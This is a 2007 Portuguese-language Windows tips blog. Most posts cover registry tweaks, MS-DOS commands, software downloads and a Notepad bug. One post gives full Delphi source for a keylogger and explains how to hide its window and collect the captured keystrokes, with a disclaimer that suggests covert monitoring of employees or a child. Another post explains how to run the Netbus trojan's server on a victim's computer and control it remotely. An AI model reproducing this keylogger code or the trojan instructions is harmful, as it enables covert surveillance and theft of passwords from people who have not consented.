Explorando

Desabilite os balões de aviso do Windows XP

2007-10-25T12:29:00.000-07:00

Se você deseja desabilitar aqueles "balões de aviso" que aparecem sempre que o Windows executa alguma função específica, faça o seguinte: vá em Iniciar / Executar, digite regedit e vá na chave HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced. Clique no menu Editar, vá em Novo / Valor DWORD, digite EnableBalloonTips e pressione Enter em seu teclado. Se já houver essa variável ali, altere o seu valor para 0 (zero). Reinicie o computador e os balões não serão mais exibidos pelo sistema.

Mude a pasta "Meus documentos" de lugar

2007-10-25T12:24:00.000-07:00

O directorio "Meus documentos" fica localizado em C:\Documents and Settings\usuario\Meus documentos por padrão (neste caminho, "usuario" é o nome do login usado no computador). No entanto, é possível colocar essa pasta em outro local. Para isso, clique sobre a pasta Meu Documentos com o botão direito do mouse e escolha a opção Propriedades. Clique em Destino e na caixa de nome Local da pasta de destino, escolha o novo diretório.

2007-10-24T14:44:00.000-07:00

por Marcos elias
www.explorando.viamep.com

A Microsoft contra o Bush, no Bloco de notas!

O pessoal da Microsoft é f*... (formalizando, rs)

Eu simplesmente não acreditei quando li (na revista Aprendiz de Hacker, logo indicarei ela aqui no Explorando)...

Abra o Bloco de notas do Windows. Digite isso:

Bush hid the facts
Se você não sabe inglês, saiba então que essa frase significa "Bush escondeu os fatos". Salve o arquivo (não coloque ponto no final). Salve como txt mesmo, com qualquer nome. Feche o bloco de notas, e abra o arquivo no bloco de notas novamente. Viu? Pois é...
O Office também tem suas pegadinhas... Devem ser feitas por programadores revoltados, fala sério. Deixa o Tio Bill saber disso... Hehehehe.

Não, é sério mesmo! Faça essa do bloco de notas no Windows XP ou Server 2003. Vai ficar um monte de quadradinhos, o bloco de notas esconderá essa frase!!!

Abrindo o mesmo arquivo no meu Mep Texto , ele abriu normal. Então o bloco de notas até salva o arquivo, mas se recusa a lê-lo se tiver esse conteúdo...
Testando em casa, vi que o mesmo funciona também se trocar "Bush" por "Google" ou "Bill", mas não alguns outros nomes (talvez hajam outros, claro)... Será que o Google ou o próprio Bill também esconde os fatos? Hehehe. (No XP não funcionou para Google nos meus testes, mas funcionou comigo no Server 2003 SP1) Erro ou teoria da conspiração??? Os dois, quem sabe... Pesquisando na net encontrei alguns comentários em inglês sobre isso (jogue no Google "Bush hid the facts", entre aspas, li justamente o http://www.hoax-slayer.com/bush-hid-the-facts-notepad.html indicado no comentário anônimo postado aqui - mas li antes de ler o comentário). Estarei atualizando este texto em breve, com base nas novas conclusões... A primeira impressão é que foi programado (pois realmente existem coisas ocultas em algumas versões do Office), a segunda impressão é de que é realmente um bug. Eu fico com a proposta de que foi programado... A menos que tenha o código-fonte do notepad.exe em mãos! Mas a teoria do bug tem lá seu sentido.

:::: Como criar um keylogger! (em Delphi) ::::

por Marcos Elias

www.explorando.viamep.com

Essa dica de Delphi é muuuuito boa! Um tempão atrás disso... Finalmente achei algo significante... Use por sua conta e risco!!!

Um método fácil de capturar TUDO O QUE É DIGITADO no computador com Windows, ou seja, um método fácil de criar um keylogger. É uma dica de programação, portanto não é para qualquer um. Uso o Borland Delphi 7, deve funcionar em diversas outras versões também...

Como é avançada, apesar de relativamente fácil, não vou comentar muito, ok?! Se você tiver dúvidas, comentários ou sugestões deixe um comentário neste post, e NÃO me envie e-mails perguntando porque não tenho tempo para responder sobre programação ou coisas avançadas.

Inicie o Delphi e crie um novo projeto. Insira um Memo e um Timer.

No código, defina a seguinte função:
function Coloca(txt: String): String;
begin
Form1.Memo1.Text := Form1.Memo1.Text + txt;
end;

E coloque no evento Timer do temporizador:
procedure TForm1.Timer1Timer(Sender: TObject);
var
keyloop, KeyResult : Integer;
begin
keyloop := 0;
repeat
KeyResult := GetAsyncKeyState(keyloop);
if KeyResult = -32767 then
begin
case keyloop of
8: Coloca(' [BACKSPACE] ');
9: Coloca(' [TAB] ');
12: Coloca(' [ALT] ');
13: Coloca(' [ENTER] ');
16: Coloca(' [SHIFT] ');
17: Coloca(' [CONTROL] ');
18: Coloca(' [ALT] ');
20: Coloca(' [CAPS LOCK] ');
21: Coloca(' [PAGE UP] ');
27: Coloca(' [ESC] ');
33: Coloca(' [PAGE UP] ');
34: Coloca(' [PAGE DOWN] ');
35: Coloca(' [END] ');
36: Coloca(' [HOME] ');
37: Coloca(' [SETA ESQUERDA] ');
38: Coloca(' [SETA ACIMA] ');
39: Coloca(' [SETA DIREITA] ');
40: Coloca(' [SETA ABAIXO] ');
45: Coloca(' [INSERT] ');
46: Coloca(' [DEL] ');
91: Coloca(' [WIN ESQUERDA] ');
92: Coloca(' [WIN DIREITA] ');
93: Coloca(' [MENU POP-UP] ');
96: Coloca('0');
97: Coloca('1');
98: Coloca('2');
99: Coloca('3');
100: Coloca('4');
101: Coloca('5');
102: Coloca('6');
103: Coloca('7');
104: Coloca('8');
105: Coloca('9');
106: Coloca(' [NUM *] ');
107: Coloca(' [NUM +] ');
109: Coloca(' [NUM -] ');
110: Coloca(' [NUM SEP. DECIMAL] ');
111: Coloca(' [NUM /] ');
112: Coloca(' [F1] ');
113: Coloca(' [F2] ');
114: Coloca(' [F3] ');
115: Coloca(' [F4] ');
116: Coloca(' [F5] ');
117: Coloca(' [F6] ');
118: Coloca(' [F7] ');
119: Coloca(' [F8] ');
120: Coloca(' [F9] ');
121: Coloca(' [F10] ');
122: Coloca(' [F11] ');
123: Coloca(' [F12] ');
144: Coloca(' [NUM LOCK] ');
186: Coloca('Ç');
187: Coloca('=');
188: Coloca(',');
189: Coloca('-');
190: Coloca('.');
191: Coloca(';');
192: Coloca(' [APÓSTROFO] ');
193: Coloca('/');
194: Coloca(' [NUM PONTO] ');
219: Coloca('´');
220: Coloca(']');
221: Coloca('[');
222: Coloca('~');
226: Coloca('\');
else
if (KeyLoop >= 65) and (keyloop <= 90) then
Coloca(Chr(keyloop));
if (keyloop >= 32) and (keyloop <= 63) then
Coloca(Chr(keyloop));
//numpad keycodes
if (keyloop >= 96) and (keyloop <= 110) then
Coloca(Chr(keyloop));
end;
end; //case;
inc(keyloop);
until keyloop = 255;
end;

ah sim, ia esquecendo.. coloque o interval do timer para "1"... senão ficará difícil captar neh.. rs

e ++:
é bom dxar o memo desabilitado (com a propriedade Enabled := False), pq se vc digitar nele, irá aparecer o q vc digitou naturalmente MAIS o q o Timer fica adicionando a ele, e ficará repedito e confuso..

Então... Rode o programa (tecle F9).
Tecle qualquer coisa no teclado e observe! Isso funciona mesmo se sua janela não estiver ativa (digo, se estiver por trás das outras ou ocultas). Keylogger que se preze... Não fica em janela!

Oculte-o como preferir, e salve o conteúdo do Memo onde quiser. Aí é com você...

Dica: para ocultar o programa, digite Application.ShowMainForm := False, no código-fonte do projeto, depois do Application.Initialize e antes do Application.CreateForm... Mas aí você deverá ter criado um método para recuperar o que foi digitado, né?!

Adapte o programa como você quiser, afinal aqui apenas mostrei como é possível capturar o que foi digitado. Lembre-se de que ele poderá ser fechado pelo Gerenciador de tarefas do Windows, através da guia "Processos".

deixo claro que esse código realmente "funciona", eu testei e coloquei algumas coisas a mais. eh soh adaptar ao q vc quer fazer!

UM KEYLOGGER PODE SER VISTO COMO UM PROGRAMA DO MAL, QUE COLETA DADOS DO USUÁRIO SEM O CONSENTIMENTO DESTE, E ENVIA AS INFORMAÇÕES COLETADAS PARA ALGUM HACKER OU PESSOA DO MAL. MAS ESSE MESMO KEYLOGGER PODE SER USADO PARA IDENTIFICAR O FUNCIONÁRIO QUE ZÔA NOS COMPUTADORES DA EMPRESA, PARA VER O QUE SUA FILHA DE 10 ANOS TECLA NO MSN, ETC. NOTE QUE PODE SER DE USO PROIBIDO EM ALGUNS PAÍSES. EM OUTROS, O MAIS COMUM, PARA SER CONSIDERADO UM SOFTWARE LEGAL ELE DEVE INFORMAR QUE O SISTEMA ESTÁ SENDO MONITORADO. EM EMPRESAS, POR EXEMPLO, OS FUNCIONÁRIOS DEVEM USAR OS COMPUTADORES PARA FINS DA EMPRESA, NUNCA COMO USO PESSOAL. ISSO DEVE SER DEIXADO BEM CLARO EM CONTRATO.

NÃO ME RESPONSABILIZO POR NADA QUE POSSA ACONTECER DEVIDO O USO DESTES CÓDIGOS AQUI APRESENTADOS. USE COM CONSCIÊNCIA E RESPONSABILIDADE, SEMPRE.

2007-10-24T12:31:00.000-07:00

:::: Skin para msn ::::

Galera vou encinar como por skin para o "MSN" é muito facil vi ne um site ingles e resolvi publicar aqui..
Que tal por o msn com o Skin do office 2007? e de muito mas..
bom o processo de instalação é muito facil abaixo vou disponibilizar o arquivo "msgsres.DLL" esse arquivo e o skin confiram abaixo os seguintes skins..

Como instalar-lo

Va a "c:/arquivos de progamas/msn messenger" com o arquivo "msgsres.DLL" copia e cola na pasta do msn va aparecer para subistituirlo clique en ok e pronto, a ja ia me esquecendo fecha o msn antes de substituir o arquivo..

Skin office_2007 clique aqui

Skin Evo 1.o Edition black (muito bom esse)Clique aqui

Skin windows Vista(bom) Clique aqui

Skin Messbe(não recomendaria) Clique aqui

Skin Zolex(para mulher)Clique aqui

Galera olha um exemplo abaixo de uns dos skins

Dicas de Sites

2007-10-24T11:02:00.000-07:00

:::: Softonic ::::

Softonic um exelente sites para dowload, tem muitos progamas uteis nele o unico problema e que ele esta en espanhol, mas eu não vejo nem um problema se tem tantos sites,progamas e talz en ingles não vejo nenhum problema..

www.softonic.com

:::: Soubalada ::::

Soubalada, site para quem e dj e quer divulgar seu trabalho "soubalada" esta ali para divulga-lo, e não so para quem é dj mas tanbem para pessoas que curten musica eletrônica não pode ficar fora dessa..

entrem já! www.soubalada.com

:::: Mediafire ::::

MediaFire é o serviço hospedando da lima livre a mais simples para que negócios, profissionais, e os indivíduos compartilhem de limas e de imagens com as outras..

www.mediafire.com

Crie maquinas virtuais com o Kemula

2007-10-23T11:08:00.000-07:00

Kemula é uma interface para o QEMU for widnows um emulador de maquinas virtuais.Bom esse progama que vou disponibilizar para dowload um amigo de um site me recomendo e agora esou recomendando para vocêis o kemula que vou mostrar agora e de um amigo ele que modificou do "Qemu for windows" agora se chama "Mep Kemula".
Olhe a interface dele, é bem simples

Elija qual dos pacotes você quer:
Clique aqui(so o kemula)
Clque aqui (Kemula + QEMU)

2007-10-23T10:16:00.000-07:00

Quer expressar seus sentimentos?

Você é o tipo de cara que Queria expressar seus sentimentos?
Você ja sofreu de amor por alguem e quer mostrar como que e dolorido sofrer por alguem..
Confire ja o blog Vamosler.blogspot.com expresse seus sentimentos, confirem já!

Dicas de Progamas

2007-10-21T13:49:00.000-07:00

:::: Dicas de Progamas ::::

Ares regular 2.0.9

Ares regular um eselente progama P2P facil de usar e leve, ocupa mas ou menos 2.99 na memoria ram, dowload mas rapidos e de boa qualidade eu recomendo..

Ares regular tem uma interfaci en portugues Você pode configurar-lo a linguage que você preferir.

Baixe aqui

Kazaa Lite K++ 2.4.3

Kazaa tanbem um bom progama pra quem ja não suporta tantos spyware, pode usar essa versão alternativa, alem de bom dowload rapido ele reproduz praticamente qualquer tipo de midia..

Clique aqui e baixe agora!

:::: Winamp ::::

O winamp é um player multimedia facil de usar e pratico, algumas pessoas preferem ele do que o tradicional Windows media player winamp reproduz praticamente qualquer tipo de media "audio" e "video", com ele é mas facil de organizar suas lista de reprudução..

Clique aqui e baixe agora

Mep Texto

Mep Texto um otimo editor de texto puros Se você é web master ou trabalha com editores de texto e esta cançado de usar o velho e tradicional "NOTPAD" o progaminha chato neh?
A interface dele esta en portugues para fasilita-los a utilização olhem a imagen a seguir:

Bom não perca mas tempo e baixe agora vale a pena testar..
Clique aqui

Restringir aplicação a os usuarios não possa executar

2007-10-20T10:07:00.000-07:00

O windows proporciona posibilidade de restringir aplicaçao que os uzuarios possam executar no trabalho, ou seja o chefe configura no registro do windows os seguintes progamas para que não possa ser executados, como por exemplo, uma pessoa no trabalho en vez de trabalhar não fica no msn sem o chefe ficar sabendo, vou encinar a os que tem uma pequena empreza e para quem se intereça que tem um computador en casa a restringir algumas aplicaçoes para os usuarios.. x)
Primeiro iniciaremos uma ferramenta para ediçao de registro de sistema, a melhor ferramenta para isso é o "regedit.exe" ou "regedit" desde "iniciar" logo en "executar" ali digita "regedit.exe" ou "regedit.exe" e procurremos a seguinte registro abaixo:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
Alí criaremos e modificaremos o valor DWord “RestrictRun” (sem aspas) com o valor "1" para ativar e "0" para desativar. Depois temos que as aplicaçoes cujo a execuçao estarar restringida que por defeito todas estao permitidas, para isso vamo para outra chave:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
E introduzimos o valor alfanumerico cujo o nome serar numeros concecutivos e como contenido terar o nome dos executaveis das aplicaçoes..

Gestione a memoria ram que o windows utiliza

2007-10-20T09:38:00.000-07:00

Podemos fazer varios ajustes no registro do windows para diminuir o tamanho de memoria ram que o windows utiliza.
Va ao "iniciar", logo, "executer" na caixa de dialogo você deverar digitar "regedit.exe" se vc quizer pode por "regedit" é igaul.. x)
La você deverar procurar o seguinte regsitro:
KEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\MemoryManagement
Ai modificaremos o valor "DisablePagingExecutive", vamos fazer que os arquivos executavaeis do "windows" sejam paginados no disco rigido, conseguindo que o "SO" e a maioria dos arquivos carreguem com mas suavidade..
A chave "DisablePagingExecutive" ponhamos o valor dela "0" que por defeito vem com "1", e pronto reinicie o micro e vera a diferença..

Crie um acesso direto para reiniciar com só dos cliques

2007-10-20T09:17:00.001-07:00

Para criar um acesso direto para reiniciar o computador com dos cliques você deverar fazer o seguinte:

Clique com o botão direito en alguma zona livre do "desktop" e va a "novo",logo, "acesso direto" e ponha la na janela "shutdown.exe -r -t 00", logo clique en seguinte e depois ponha o nome que você preferir e clique en ok ou en finalizar..

Dica: Da para você progamar o tempo estimado para reinicializaçao, ponha la por exemplo "shutdown.exe -r -t 12" en vez de "00" eu puis "12", da para você por até 99 segundos..

Desativar o reinicio automatico

2007-10-20T09:00:00.000-07:00

O windows xp igual que o 2000, ao a produzir um error ele se reinicia de forma automatica o computador, mas sim por qualquer razaão você quer tirar essa opção de reinicio automatico, você deve fazer o seguinte:

Va ao iniciar logo painel de controles e você deve dar dois cliques sobre a opção "Sistema"

Feito isso você deverar ir a opções avançadas e logo va a opção "inicio e recuperaçao", feito isso va a opção Error do sistema, ali nessa opçao desmarque ela e de ok.

Nota: Provalvelmente va a pedi para reiniciar antes de reiniciar feche todos os progamas que estem executados..

O Windows xp tem um progama que permite a microsoft seguir seu rastro na Web!

2007-10-20T08:40:00.000-07:00

Que progama é esse?

É un controle "Active x" queo lo permite leer o HWID (wardware ID)tanbem a sim como MSID (microsoft ID) do computador que permite a "microsoft" te rastrear..

:::: Como eliminar-lo? ::::

1ª Va "ao iniciar---> executar.."

2ª Escreva na caixa de Dialogo(executar) de acordo com a versão do seu Sistema operativo e o seguinte:

Para XP HOME EDITION

"regsvr32.exe -u c:\windows\system32\egwizc.dll"

Para XP Profesional

"regsvr32.exe -u c:\winnt\system32\egwizc.dll"

3ª Clique en ok para validar. Vai vizualizar uma ventana com essa:

"DllUnregisterServer en c:\windows\system32\egwizc.dll con éxito".

Como remover o Messenger do seu sistema?

2007-10-20T08:30:00.000-07:00

:::: Remova o Messenger do seu sistema operativo ::::

Se você Não utiliza o Messenger que vem junto com o windows xp, você quer eliminarlo não?

Vou encinar a vocêis como eliminar o Messenger antigo do seu sistema operativo, primeiro va ao iniciar --> executar logo você ponha o seguinte "RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove"

Nota: você devera reiniciar o computador ponha esses comandos sem as aspas..

2007-10-19T15:02:00.000-07:00

:::: O explorando tem dois endereços ::::

O explorando tem dos endereços! alem do http://explorandoeapanhando.blogspot.com ele tem tanbem o www.explorando.blogspot.com, um amigo que envio para min e eu claro nem sabia eu fui corrigir ele que não é com o www quando cliquei no link abriu direto na minha pagina.. ;) legal o blog ta cada vez melhorando mas..

2007-10-18T14:05:00.000-07:00

:::: Dual boot? axo que não ::::

Galera no meu computador tem dois sistemas operativos(windows)..Bom eu ja tinha instalado o xp no meu pc dai eu resolvi a fazer uma partiçao e instalar o windows 98, para deixar en dual boot, so que dai quando eu terminei de insalar o windows 98 quando eu ligava o computador ja dava boot do 98, nossa fiquei muito grilado com isso.

Dai eu fui no prompt de comando(Msdos) e digitei "fdisk" dai apaareceu la as partiçao e talz, dai eu fui ver a partiçao que tava ativa era justo o windows 98 sistema de arquivos "FAT32" e o do xp "NTSF", dai sempre que eu quizer usar o xp ou o windows 98 tenhu que ativa a partiçao "NTFS" pro xp e a partiçao "FAT32" pro windows 98..Dual boot nada e moo complicado tem que ficar dano boot pelo diskete pra acessar os sistemas operacionais..

Vejam a abaixo algumas imagens que fiz executando progamas pesados no windows 98..

Olha na imagen a cima ai estava usando o fireworks no 98..xD.. nossa o 98 não reconhece meus drivers

Nossa é muito orrivel repare na imagen veja nem tem muitos colores mas mesmo assim quero ficar com o 98 quero saber os principais segredos dele..

Noticias microsoft

2007-10-15T13:43:00.000-07:00

Windows Server 2008 Será Lançado Junto com o Visual Studio 2008 e o SQL Server 2008

Acaba de ser anunciado na Worldwide Partner Conference que o Windows Server 2008 será lançado juntamente com o Visual Studio 2008 e SQL Server 2008 em 27 de fevereiro de 2008, em Los Angeles. Como o mais importante lançamento corporativo da história da companhia, ele dará o pontapé inicial a uma “onda de lançamentos” de centenas de eventos mundiais hospedados pela Microsoft.

Serviços de Implantação do Windows

Os Serviços de Implantação do Windows é uma tecnologia chave para a implantação do Microsoft Windows Server, 2008

Os Serviços de Implantação do Windows da Microsoft é uma forma de implantar sistemas operacionais Windows de forma rápida e remota, como o Windows Vista ou o Windows Server 2008. Ele permite que você instale sistemas operacionais Windows em uma rede com computadores que não possuam sistema operacional instalado, sem a necessidade de que uma pessoa esteja fisicamente presente diante do computador de destino e sem a utilização de mídias de instalação. Os Serviços de Implantação do Windows estão disponíveis como uma atualização para o Windows Server 2003; uma versão aprimorada está incluída com o Windows Server 2008.

Clique aqui e saiba mas

:::: Comandos do msdos ::::

2007-10-15T11:43:00.000-07:00

Aqui vai alguns comandos do msdos.. confirem a baixo!

APPEND : Permite que programas abram arquivos de dados em diretórios especificados, como se estivessem no diretório atual
ATTRIB : Exibe ou altera os atributos dos arquivos
CD : Altera ou exibe o diretório atual
CHCP : Exibe ou define o número de páginas de código ativa
CHDIR : Altera ou exibe o diretório atual
CHKDSK : Verifica o disco e exibe um relatório sobre seu estatus
CLS : Limpa a tela
COMMAND : Começa uma nova versão do interpretador de comandos do DOS
COMP : Compara o conteúdo de dois arquivos
COPY : Copia arquivos para outro lugar
CTTY : Altera o dispositivo de terminal usado para controlar o sistema (CUIDADO)
DATE : Exibe ou altera a data
DRVSPACE : Instalar ou configurar unidades compactadas
DEBUG : Programa de teste e utilitário de edição(CUIDADO ao utilizá-lo)
DEFRAG : Optimiza o disco reorganizando os arquivos
DEL : Para excluir arquivos
DELOLDOS : Para excluir o diretório OLD DOS.1 e todos os arquivos contidos nele
DELTREE : Exclui o diretório arquivos e subdiretórios nele contido
DIR : Exibe uma lista de arquivos e subdiretórios de um diretório
DISKCOMP : Compara o conteúdo de dois disquetes
DISKCOPY : Faz copia de disquete para disquete
DOSKEY : Editar linhas de comandos, ativa comandos dos DOS e cria Macros
DOSSHELL : Iniciar o MS-DOS SHELL
ECHO : Mostra mensagens ou ativa e desativa a exibição de comandos
EDIT : Iniciar o editor do DOS, que cria e altera arquivos ASCII
EMM386 : Ativar ou desativar o suporte à memória expandida EMM386
ERASE : Excluir um ou mais arquivos
EXIT : Sai do Programa command.com
EXPAND : expande arquivos compactados
FASTHELP : fornece informações resumidas sobre os comandos do DOS
FASTOPEN : Diminuir o tempo necessário à abertura de arquivos e diretórios
FC : Compara dois ou mais arquivos e exibe as diferenças entre eles
FDISK : Configurar o disco rígido
FIND : Procura por uma seqüência de caracteres em arquivos
FOR : Executa um comando para cada arquivo em um conjunto de arquivos
format : comando que formata o hd (cuidado se vc usar esse comando poderá perder tudo quem tem no hd)

:::: O que vem a ser o msdos? :::::

2007-10-15T10:36:00.000-07:00

Galera vocês e o tipo que não se dar muito bem com a sub plataforma do windows(msdos)?

Estou aqui para ajudarlos a melhorar seus conhecimentos sobre ele.Mas primeiro deveremos saber oque e o msdos, oque vem a ser??

MS-DOS é uma acrossemia de MicroSoft Disk Operating System (sistema operacional em disco da Microsoft); é um nome genérico do sistema operacional licenciado pela Microsoft Corporation para uso em vários microcomputadores de diferentes de fabricantes. Alguns destes fabricantes alteram o MS-DOS para melhor adaptá-lo a seus computadores dando-lhe novos nomes, como PC-DOS ou Z-DOS. Baseando-se no nome disk-operating system (sistema operacional em disco, ou DOS), pode-se imaginar que tudo o que o MS-DOS é gerenciar seus discos. Entretanto, o MS-DOS faz muito mais que isto: ele proporciona um modo de se dizer ao computador qual o programa ou comando que se deseja executar, onde ele encontrará este programa ou comando e o que ele deve fazer com ele. Por exemplo, ele pode enviar informações à tela de vídeo, a uma impressora ou a uma porta de comunicações, para que elas sejam enviadas a outro sistema. O sistema operacional pode ser considerado como operacionalizável em dois níveis: O primeiro nível é um sistema de gerenciamento de hardware: o MS-DOS coordena a unidade central de processamento do computador (a CPU, que é o chip microprocessador que atua como o "cérebro" do computador) com o resto do hardware. Nesta capacidade, o MS-DOS capta o caractere digitado no teclado, codifica-o de forma que a CPU possa entender e, então, exibe-o no monitor de uma forma que o usuário possa entender. Ou seja, o MS-DOS atua como intermediário, convertendo os sinais eletrônicos gerados pelo teclados em códigos de controle que os programas de aplicação possam utilizar. Ele também executa pequenas tarefas relacionadas com a utilização dos programas , como a formatação de um disco, ou informando-lhe sobre os arquivos que se encontram em um determinado disco.

O segundo nível no qual o MS-DOS opera é a função utilitária. Nesta capacidade, o MS-DOS executa comandos, o que lhe permite interagir diretamente com o computador. Estes comandos executam funções como renomear arquivos no disco ou copiar arquivos de um lugar para o outro. O MS-DOS trata de seus próprios comandos exatamente como os programas de aplicação. Estes comandos, entretanto, são mais limitadors que a maioria dos programas de aplicação. Eles não executam tarefas como o processamento de palavras ou a contabilidade; em vez disso, são usados para a manutenção geral de seu computador. Cada comando possui um nome, que é geralmente de fácil memorização. Este trabalho se aterá apenas ao primeiro nível de operacionalização do MS-DOS. Comunicando-se com o Hardware A CPU do computador não pode funcionar bem sem um sistema operacional. O MS-DOS coordena o hardware e permite que a CPU comunique-se com quase todas as partes de seu computador. Após carregar o sistema operacional (geralmente logo após o computador ter sido ligado), ele é mantido na memória de acesso aleatório do computador (RAM). A memória RAM é temporária, isto é, ela só é mantida pela força elétrica do computador. Quando este é desligado ou a energia é cortada mesmo que por alguns segundos, todas as informações guardadas em RAM são perdidas. O processo de colocação em RAM dos dados vindos de foontes como o teclado e, alternativamente , a captação de informações da RAM e o seu envio para um dispositivo de hardware diferente, como a tela de vídeo, é chamado de E/S, ou entrada/saída. Cada vez que forem "lidas" informações advindas de algum dispositivo de hardware, como um acionador de disco, ou "gravadas" em um dispositivo de hardware, como uma impressora, o MS-DOS executa uma operação de E/S.

Um dispositivo é simplesmente uma peça de hardware que utiliza E/S. Por exemplo, uma impressora, um monitor, um acionador de disco, etc. Os dispositivos são conectados ao computador por meio de portas seriais ou paralelas. Quando a CPU precisa se comunicar com outro hardware, ela utiliza a parte do sistema operacional que conhece esse hardware. Executando Programas de Aplicação Em seu papel de intermediário entr e a CPU e um programa de aplicação, o MS-DOS executa tarefas importantes. Ele obtém o programa que você deseja executar e coloca-o em RAM, além de ajudar o programa a executar E/S. Quando o usuário comunica ao MS-DOS que deseja executar determinado programa, ele encontra o programa no disco, carrega-o em RAM e mostra à CPU o local do início do programa. Nota: Há programas de aplicação desenvolvidos para sistemas operacionais diferentes do DOS, como o OS/2 ou Windows NT, por exemplo. O Windows 3.1, que é utilizado em muitos micros, geralmente é confundido com um sistema operacional, porém é apenas uma plataforma. Ele se utiliza do DOS para fazer as entradas e saídas, como qualquer outro programa de aplicação, porém fornece recursos como os de um sistema operacional para os programas de aplicação que o utilizam. Discos e Arquivos Quando dados são guardados em disco, eles são gravados em arquivos. As informações em arquivos podem consistir em texto, dados, programas, etc. O arquivo pode ter qualquer tamanho, limitado apenas pelo espaço disponível em disco.

Os arquivos são armazenados em discos ou disquetes. Um disco (ou disco rígido, ou ainda "Winchester"), é uma peça circular de material rígido coberto por um material magnético (podem ser várias peças como essa agrupadas em um único "Winchester"); um disquete (ou disco floppy) é uma versão flexível do disco, com capacidade menor.

Para recuperar arquivos do disco, o cabeçote percorre o mesmo até o local onde está armazenado o arquivo. O cabeçote lê primeiramente o diretório, onde estão informações sobre o arquivo. A partir daí e da File Allocation Table, o DOS descobre em que local do disco o arquivo se encontra, o que é determinado por trilhas e setores, como se fosse os eixos X e Y do disco. As trilhas são círculos concêntricos e os setores são como fatias do disco, como mostra a figura ao lado. Uma cluster, em linguagem técnica, é a intersecção de um setor com uma trilha. Um cluster possui um número fixo de bytes e um arquivo pode ocupar um ou mais clusters, sequencialmente ou não. É esse o papel da File Allocation Table, ou simplesmente FAT: mostrar ao DOS onde se encontram as diversas partes do arquivo espalhadas pelo disco. Trabalho feito por Willian Cruz em Abril de 94, no terceiro ano do curso de Administração de Empresas com ênfase em Análise de Sistemas da FASP, de São Paulo, para a matéria de “Sistemas Operacionais”. Como o DOS praticamente não mudou de lá pra cá, ele continua se mantendo bastante atual. A imagem que fala sobre discos ilustra um disquete de 5¼, mas os discos de 3½ funcionam do mesmo modo (com exceção, claro, do entalhe de proteção contra gravação, sobre o qual se colavam etiquetas metálicas, hoje substituído por uma peça de plástico do tipo “abre e fecha”).

:::: Como baixar sites inteiros com o wget ::::

2007-10-14T15:22:00.000-07:00

:::: Baixe sites inteiros com o wget! ::::

Se você não tem intimidade com o prompt de comando, pode usar esta interface que criei, para baixar sites inteiros com o WGet sem complicação:

Clique aqui

Como fucionam os trojans?

2007-10-14T14:47:00.000-07:00

:::: O que são trojans ::::

O poema épico Ilíada, escrito pelo poeta Homero, narra a história da Guerra de Tróia, que após dez anos de combate sem sucesso, os gregos construíram um enorme cavalo de madeira e colocaram alguns soldados no interior deste, oferecendo aos troianos, que receberam pensando tratar-se de um presente. Mas durante a noite, os soldados saíram do interior do cavalo e abriram os portões da cidade para que o exército grego entrasse e massacrasse os troianos semi-adormecidos. Foi a partir desta história que surgiu o termo trojan, para os programas que abrem as portas de um micro e possibilitam a invasão. Até hoje, a história da guerra de Tróia, não possui autenticidade comprovada

Os trojans são bem diferentes dos vírus, embora possuem algumas semelhanças, como, por exemplo, perda de arquivos. Mas eles (os tojans), não se tratam apenas de programinhas escritos para destruir ou para causar qualquer dano aos micros, como os vírus. Eles são programas muito mais inteligentes, que podem ser controlados de qualquer ponto do planeta, com uma facilidade incrível, podendo até mesmo serem controlados por crianças.

Os trojans possuem duas partes: o cliente e o servidor. O servidor, obviamente, deverá ser instalado no computador da vítima e o cliente deverá ser utilizado pelo invasor. Um bom exemplo de trojan seria o tão conhecido Netbus. Repare que todos os trojans possuem o servidor como um simples executável e o cliente com interface gráfica, e é justamente isto que garante a facilidade de uso destes programas, até mesmo por leigos.

Basicamente, a função do servidor será a de abrir as portas do micro, possibilitando a invasão. Uma vez abertas as portas, o invasor terá a possibilidade de invadir, obtendo total controle da máquina, podendo baixar, deletar, renomear arquivos e até mesmo, assustar ou brincar com a vítima abrindo o drive de CD-ROM, abrindo caixas de mensagens, enfim, uma infinidade de opções.

Além disso, muitos trojans também são Keylogers, programas que captam tudo o que é digitado no teclado, inclusive senhas de e-mail, senhas de contas bancárias, etc, enviando esses dados por e-mail ou até mesmo via mensageiros instantâneos, como o ICQ.

Mas e como se prevenir destes ataques? A resposta é simples: nunca execute um programa de origem desconhecida. Não pense você que ter instalado um antivírus resolverá o problema, pois a cada dia surgem novos trojans, muitos deles indetectáveis pelos antivírus. Existem também alguns programas chamados binders que têm a capacidade de unir dois ou mais executáveis num único programa. Você poderá estar instalando um jogo, por exemplo, e paralelamente um trojan estar sendo iniciado sem que você perceba.

Atualmente temos vários trojans Internet a fora, podendo ser baixados em vários sites, principalmente sites hacker. Aqui utilizarei como exemplo dois destes, os mais conhecidos: o Netbus e o Beast.

:::: netbus ::::

Ao baixá-lo você obterá dois arquivos: um chamado Patch.exe e outro chamado Netbus.exe. O Patch é a parte servidor e ele deverá ser executado no computador da vítima. Após executado, basta você abrir o Netbus, digitar o IP do micro alvo e clicar em Connect!

Neste caso eu testei a invasão no meu próprio micro como exemplo, veja o IP 127.0.0.1. Uma vez estando conectado, você poderá fazer o que quiser com o micro.

Veja alguns botões e suas funções:

Server admin:clicando nele você terá a opção de fechar ou remover o servidor do micro da vítima.

Open CD-ROM:abre o drive de CD-ROM.

Show image:fornecendo o diretório, uma imagem será exibida. É preciso colocar a extensão (.bmp ou .jpg).

Swap mouse:o ponteiro do mouse é ocultado.

Start program:fornecendo o diretório, um programa será aberto.

Msg manager:aqui uma mensagem será exibida na tela. Você pode digitar o que quiser, escolher o tipo de mensagem e os botões que irão aparecer

Galera tem mais um monte mas to com preguisa de por.rsrsrs

O programa Netbus é um dos mais simples para este tipo de ataque. Além de possuir poucas funções, ele não serve para invadir computadores em redes privadas, como escolas, lan houses, etc. E o acesso aos arquivos só será possível via linha de comando, utilizando o programa telnet.

Como se trata de um programa já criado há muitos anos, o Netbus é praticamente detectado por todos os antivírus, tanto o patch como o próprio programa cliente. Testado no AVG, ele é detectado quase que instantaneamente e os dois arquivos são bloqueados. Já no AVAST, o antivírus só detecta se for feito um escaneamento no diretório que contém o trojan, mas mesmo assim os dois arquivos acabam sendo bloqueados.

:::: Beast ::::

